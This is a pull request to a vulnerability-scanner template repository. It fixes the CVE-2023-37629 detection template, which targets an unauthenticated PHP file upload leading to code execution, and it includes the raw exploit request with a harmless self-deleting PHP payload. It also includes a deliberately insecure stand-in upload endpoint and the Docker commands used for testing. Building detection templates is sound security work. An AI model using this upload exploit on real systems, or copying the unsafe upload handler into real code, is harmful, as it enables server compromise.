### PR TITLE
fix(cve-2023-37629): close filename quote before the .php extension

### DIFF
--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -68,7 +68,7 @@ http:
 
         4fwefwe
         -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-        Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
+        Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}.php"
         Content-Type: application/x-php
 
         <?php echo md5("{{string}}");unlink(__FILE__);?>


### PR DESCRIPTION
### PR Information

- Fixed CVE-2023-37629 - the `pigphoto` part closes its `filename` quote before `.php` instead of after it, so the file the target stores has **no `.php` extension** and the uploaded payload never executes.

```
Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
```

PHP's `multipart/form-data` parser reads the quoted string as `filename="<rand>"` and discards the trailing `.php"`, so the extension is lost. The matcher still fires, because the app answers `302` + `successfully created` whichever name it stored - the template reports critical RCE while the planted file is inert.

Verified in Docker with `nuclei v3.11.0` against `php:8.3-apache` (PHP 8.3.33) plus a minimal stand-in for the upload endpoint that stores `pigphoto` under the client-supplied name in `uploadfolder/`, mirroring the behaviour described in the advisory:

| | filename PHP recorded | fetching the stored file |
| --- | --- | --- |
| current template | `Ry3ei` - extension dropped | returns `<?php echo md5("CVE-2023-37629");unlink(__FILE__);?>` verbatim, not executed |
| this PR | `blPAP.php` | executes: `b455d61afe3331059e394d53dcaffad6` = `md5("CVE-2023-37629")` |

So the fix turns a finding that cannot actually plant a webshell into one that does.

Two related notes:

- `nuclei -validate` passes on both the current and the fixed template - the flaw is in the raw body, not the schema, which is presumably why it went unnoticed.
- Servers with a strict quoted-string parser (a Jetty 12 + Spring MVC target, for instance) reject the malformed part header outright and answer `500`, so the current template also leaves 5xx noise on hosts that do not run this product at all.

<details>
<summary>Stand-in endpoint and commands used</summary>

`/var/www/html/pig/add-pig.php`:

```php
<?php
$uploadDir = __DIR__ . '/../uploadfolder/';
if (!is_dir($uploadDir)) { mkdir($uploadDir, 0777, true); }
if (isset($_FILES['pigphoto']) && $_FILES['pigphoto']['error'] === UPLOAD_ERR_OK) {
    $name = $_FILES['pigphoto']['name'];
    move_uploaded_file($_FILES['pigphoto']['tmp_name'], $uploadDir . $name);
    header('Location: /pig/manage-pig.php', true, 302);
    header('X-Parsed-Filename: ' . $name);
    echo "successfully created\n";
    exit;
}
http_response_code(200);
echo "no pigphoto upload was parsed\n";
```

```bash
docker network create nucleiverify
docker run -d --name phpsvc --network nucleiverify php:8.3-apache
# copy the stub to /var/www/html/pig/add-pig.php, then:
docker run --rm --network nucleiverify -v "$PWD:/tpl:ro" projectdiscovery/nuclei:latest \
  -u "http://<phpsvc-ip>" -t /tpl/CVE-2023-37629.yaml -duc -nc -debug-resp
docker exec phpsvc ls -1 /var/www/html/uploadfolder/
```

`X-Parsed-Filename` echoes `$_FILES['pigphoto']['name']` so the two variants can be compared directly.

</details>

- References:
  - The PoC this template is based on ([1337kid/Piggery_CMS_multiple_vulns_PoC](https://github.com/1337kid/Piggery_CMS_multiple_vulns_PoC/blob/main/exploit.sh)) uploads with `curl -s -F pigphoto=@shell.php ...`, and curl emits a balanced `filename="shell.php"` - so `<rand>.php` is the intended value.
  - Template originally added in #8113.

### Template validation

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

Both boxes are unticked on purpose: neither check was run against the product, as I have no Online Piggery Management System 1.0 instance. The patched-host check was not attempted in any form.

What was run instead is the `php:8.3-apache` stand-in described above, which reproduces the configuration this CVE describes - unauthenticated POST to `add-pig.php`, `pigphoto` stored in a web-served directory under the client-supplied name. Against it the fixed template plants a file that executes and the current template plants one that does not. That pins down the parser behaviour and the exploitation mechanics on the PHP version the product runs on; it does not show that the product itself responds identically. Happy to defer to anyone who can run this against a real instance.

#### Additional Details

A code search for `}}".php"` across this repo returns only this file, so this looks like a transcription slip when the curl-based PoC was rewritten as a raw request rather than a pattern used elsewhere.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
